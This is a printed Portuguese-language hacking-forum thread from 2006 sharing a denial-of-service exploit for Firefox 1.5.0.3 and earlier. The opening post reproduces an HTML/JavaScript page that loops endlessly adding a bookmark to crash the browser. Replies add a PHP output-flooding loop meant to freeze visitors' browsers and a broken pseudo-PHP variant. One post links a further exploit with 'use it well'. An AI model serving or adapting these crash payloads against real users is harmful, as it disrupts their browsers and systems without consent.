Print Page - Mozilla Firefox <= 1.5.0.3 (Loop) Denial of Service Exploit

Title: Mozilla Firefox <= 1.5.0.3 (Loop) Denial of Service Exploit
Post by: insanity on 06 de June , 2006, 06:08:04 PM

Code Select

<html>
<title>Bug</Title>
<body>
<script language="JavaScript1.2" type="text/javascript">

function MainPageBookmark() {title="Gianni Amato"; url="http://www.gianniamato.it/";

if (window.sidebar) { window.sidebar.addPanel(title, url,"");} else if( window.external )

{ window.external.AddFavorite( url, title); } else if(window.opera && window.print) { return true; }}

for (k=0;k<k+1;k++) MainPageBookmark();

</script>
</body>
# milw0rm.com [2006-05-18]

Title: Re: Mozilla Firefox <= 1.5.0.3 (Loop) Denial of Service Exploit
Post by: HadeS on 06 de June , 2006, 06:53:34 PM

Tem uma falha um pouco recente no Firefox, com as TAGs "". Depois posto um exploit.

Vou dar uma breve explicação. A função MainPageBookmark() adiciona uma página aos favoritos (http://www.gianniamato.it/ (http://www.gianniamato.it/)), e existe o loop FOR, que diz que se K for menor que K+1 (Dããã) ele chama a função MainPageBookmark(), assim o script vai adicionar infinitamente essa página aos favoritos.

HadeS

Title: Re: Mozilla Firefox <= 1.5.0.3 (Loop) Denial of Service Exploit
Post by: slul on 06 de June , 2006, 09:10:52 PM

tbm da pra fazer um belo DoS em qualquer Navegador com PHP

mas daí o server pode se ferrar tbm neh...

afinal o php eh uma linguagem server side...

exemplo criado por mim agora de looping pra DoS de webbrowser em php

for($x=0; $x<1000000000;$x++){
echo "Esse é o flood número $x

Esse é o flood número $x

Esse é o flood número $x

Esse é o flood número $x

Esse é o flood número $x

Esse é o flood número $x

Esse é o flood número $x

Esse é o flood número $x

Esse é o flood número $x

Esse é o flood número $x

Esse é o flood número $x

Esse é o flood número $x

Esse é o flood número $x

Esse é o flood número $x

Esse é o flood número $x

Esse é o flood número $x

Esse é o flood número $x

Esse é o flood número $x

Esse é o flood número $x

Esse é o flood número $x

";
}

?>

vai ser bem desagradável com certeza =D

Title: Re: Mozilla Firefox <= 1.5.0.3 (Loop) Denial of Service Exploit
Post by: HadeS on 07 de June , 2006, 09:11:27 PM

Se não me engano, o navegador emite algum aviso quando se depara com um script assim.

Acho que o ideal seria:

Code Select

<?
int x = 0; // HUahuahuah... Não sei declarar variaveis em PHP :P
while(1<2)
{
Esse é o flood número $x<br>
x++;
}
?>

Creio que seria mais eficaz.

HadeS

Title: Re: Mozilla Firefox <= 1.5.0.3 (Loop) Denial of Service Exploit
Post by: slul on 07 de June , 2006, 09:23:11 PM

Quote from: "HadeS"Se não me engano, o navegador emite algum aviso quando se depara com um script assim.

Acho que o ideal seria:

Code Select Expand
<? int x = 0; // HUahuahuah... Não sei declarar variaveis em PHP :P while(1<2) { Esse é o flood número $x<br> x++; } ?>
Creio que seria mais eficaz.

HadeS

Hehehehe nao emite nada nao afinal so o server sabe o q contem o arquivo php

pelo menos aki meu firefox travou =)

Title: Re: Mozilla Firefox <= 1.5.0.3 (Loop) Denial of Service Exploit
Post by: _Dr4k0_ on 09 de June , 2006, 05:25:52 PM

u.u

legal mas até agora to pensano e não achei algo mto útil que dah para se fazer com isto;//

se eu pensar em algo posto aki

Title: Re: Mozilla Firefox <= 1.5.0.3 (Loop) Denial of Service Exploit
Post by: HadeS on 14 de June , 2006, 04:10:28 PM

QuoteTem uma falha um pouco recente no Firefox, com as TAGs "". Depois posto um exploit.

Tá aqui o exploit.

Façam bom uso.

HadeS

Title: Re: Mozilla Firefox <= 1.5.0.3 (Loop) Denial of Service Exploit
Post by: HadeS on 14 de June , 2006, 04:11:51 PM

Link: http://www.darkers.com.br/smf/index.php ... 008.0.html (http://www.darkers.com.br/smf/index.php/topic,3008.0.html)

Desculpem me.

HadeS

FORUM DARKERS

Segurança & Hacking => Bugs | Exploits | Vulnerabilidades => Topic started by: insanity on 06 de June , 2006, 06:08:04 PM